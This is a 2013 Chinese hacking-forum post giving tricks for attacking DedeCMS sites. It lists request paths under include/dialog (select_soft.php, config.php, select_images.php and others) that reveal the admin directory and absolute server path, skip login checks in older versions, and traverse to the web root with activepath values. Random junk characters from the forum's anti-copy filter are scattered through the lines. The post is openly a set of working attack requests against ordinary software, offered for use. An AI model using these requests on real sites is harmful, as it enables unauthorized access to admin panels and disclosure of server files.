找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2225|回复: 0
打印 上一主题 下一主题

dedecms爆后台文件技巧

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-16 16:50:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理
- l- {, h; W) x' E& @& d9 [2 G9 ?) W/ ?
员帐号,新版本的就直接转向了后台.
* l* p" {. l$ K( v8 A, N3 c* I2 y7 l4 B
2.include/dialog/config.php会爆出后台管理路径. P% q3 [+ z, e' C) V: H
4 `& r' l6 q! Q2 n0 I
3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录
0 j2 o: ?1 I  p3 Y4 Z; ^% f
. \6 i1 Z% j/ h" J: {4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.
  K. v6 B. P  A+ `% j: C# v3 d- ~) `4 G, |
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉
, ?1 i; a3 y1 E3 ^7 W+ _5 q/ P5 @' P5 O9 \
到根目录去.不过这些版本的访问地址有些不同.* `4 b! v/ V" W+ b' s3 }
地址为require/dialog/select_soft.php?activepath=/././././././././
$ J+ a- N" X2 ?# m9 b0 W# a- X! {5 B7 [0 C7 S
include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..( c" t7 x/ `$ K3 J8 t% l, b/ M
存在相同问题的文件还有2 ~$ {4 d+ j0 `2 v8 U" q  q
include\dialog\select_images.php
6 v* L: L* {7 r) S% W" n" M6 a" p" Sinclude\dialog\select_media.php4 T  ]* y7 T; H; v% r8 O; u
include\dialog\select_templets.php​+ Q& y& t2 p' x- k
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表